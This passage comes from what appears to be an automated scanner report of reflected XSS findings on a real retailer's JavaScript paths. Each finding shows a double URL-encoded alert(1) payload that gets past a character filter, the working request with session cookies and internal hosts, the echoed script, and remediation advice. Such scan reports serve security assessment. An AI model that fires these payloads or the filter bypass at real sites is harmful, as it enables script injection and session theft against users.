This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsd427d%2522%253balert%25281%2529%252f%252fafb0e2c2678/controls.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=t3=1289930583180&pi=/content/sigma-aldrich/the-americas/united-states; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1289930583180}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsd427d";alert(1)//afb0e2c2678/controls.js","E404") ;
   </script>
...[SNIP]...

1.505. http://www.sigmaaldrich.com/js/controls.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/controls.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2104b%2522%253balert%25281%2529%252f%252fc1d92a36425 was submitted in the REST URL parameter 2. This input was echoed as 2104b";alert(1)//c1d92a36425 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/controls.js2104b%2522%253balert%25281%2529%252f%252fc1d92a36425 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=t3=1289930583180&pi=/content/sigma-aldrich/the-americas/united-states; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1289930583180}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/controls.js2104b";alert(1)//c1d92a36425","E404") ;
   </script>
...[SNIP]...

1.506. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/fontsizer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3662%2522%253balert%25281%2529%252f%252fb78f9467503 was submitted in the REST URL parameter 1. This input was echoed as d3662";alert(1)//b78f9467503 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsd3662%2522%253balert%25281%2529%252f%252fb78f9467503/core/fontsizer.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:59 GMT
Connection: close
Set-Cookie: JSESSIONID=540c4c55-a298-1442-82a5-f5675e3bfe27;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsd3662";alert(1)//b78f9467503/core/fontsizer.js","E404") ;
   </script>
...[SNIP]...

1.507. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/fontsizer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4217%2522%253balert%25281%2529%252f%252f03e4eed2201 was submitted in the REST URL parameter 2. This input was echoed as b4217";alert(1)//03e4eed2201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/coreb4217%2522%253balert%25281%2529%252f%252f03e4eed2201/fontsizer.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:02 GMT
Connection: close
Set-Cookie: JSESSIONID=ce1ccbde-6ebf-2444-8408-855d8a3fac59;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/coreb4217";alert(1)//03e4eed2201/fontsizer.js","E404") ;
   </script>
...[SNIP]...

1.508. http://www.sigmaaldrich.com/js/core/fontsizer.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/fontsizer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee23a%2522%253balert%25281%2529%252f%252fa2324c5a597 was submitted in the REST URL parameter 3. This input was echoed as ee23a";alert(1)//a2324c5a597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core/fontsizer.jsee23a%2522%253balert%25281%2529%252f%252fa2324c5a597 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:05 GMT
Connection: close
Set-Cookie: JSESSIONID=9dad5344-0b03-bc4d-8d51-42e587371757;Path=/
Content-Length: 28924


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core/fontsizer.jsee23a";alert(1)//a2324c5a597","E404") ;
   </script>
...[SNIP]...

1.509. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/scripts.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7ea3%2522%253balert%25281%2529%252f%252f2d31382d1e2 was submitted in the REST URL parameter 1. This input was echoed as b7ea3";alert(1)//2d31382d1e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsb7ea3%2522%253balert%25281%2529%252f%252f2d31382d1e2/core/scripts.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=87c53a14-b6d6-8642-82ac-a0c3a13dadee;Path=/
Content-Length: 28922


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/jsb7ea3";alert(1)//2d31382d1e2/core/scripts.js","E404") ;
   </script>
...[SNIP]...

1.510. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/scripts.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12e4b%2522%253balert%25281%2529%252f%252fa49b83495f6 was submitted in the REST URL parameter 2. This input was echoed as 12e4b";alert(1)//a49b83495f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core12e4b%2522%253balert%25281%2529%252f%252fa49b83495f6/scripts.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=c8b0cacb-de18-d048-88b0-987aec8f2155;Path=/
Content-Length: 28922


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core12e4b";alert(1)//a49b83495f6/scripts.js","E404") ;
   </script>
...[SNIP]...

1.511. http://www.sigmaaldrich.com/js/core/scripts.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/scripts.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78bb9%2522%253balert%25281%2529%252f%252fb6b56e087ef was submitted in the REST URL parameter 3. This input was echoed as 78bb9";alert(1)//b6b56e087ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core/scripts.js78bb9%2522%253balert%25281%2529%252f%252fb6b56e087ef HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:04 GMT
Connection: close
Set-Cookie: JSESSIONID=8311ce88-5db8-c64b-8b21-e51d1a11064c;Path=/
Content-Length: 28922


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core/scripts.js78bb9";alert(1)//b6b56e087ef","E404") ;
   </script>
...[SNIP]...

1.512. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/validation.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7b8%2522%253balert%25281%2529%252f%252f39f1ed159ac was submitted in the REST URL parameter 1. This input was echoed as 7a7b8";alert(1)//39f1ed159ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js7a7b8%2522%253balert%25281%2529%252f%252f39f1ed159ac/core/validation.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=cc408828-a448-f843-8358-4a510a6abbfe;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js7a7b8";alert(1)//39f1ed159ac/core/validation.js","E404") ;
   </script>
...[SNIP]...

1.513. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/validation.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873e9%2522%253balert%25281%2529%252f%252fe6051b5e846 was submitted in the REST URL parameter 2. This input was echoed as 873e9";alert(1)//e6051b5e846 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core873e9%2522%253balert%25281%2529%252f%252fe6051b5e846/validation.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:01 GMT
Connection: close
Set-Cookie: JSESSIONID=ccdbf2f1-0cc4-e243-8391-b0cec8a5b256;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/core873e9";alert(1)//e6051b5e846/validation.js","E404") ;
   </script>
...[SNIP]...

1.514. http://www.sigmaaldrich.com/js/core/validation.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /js/core/validation.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f83e%2522%253balert%25281%2529%252f%252f6b129e705e5 was submitted in the REST URL parameter 3. This input was echoed as 6f83e";alert(1)//6b129e705e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/core/validation.js6f83e%2522%253balert%25281%2529%252f%252f6b129e705e5 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:04 GMT
Connection: close
Set-Cookie: JSESSIONID=6912a03a-a711-2d45-8565-5c21d86b9a49;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
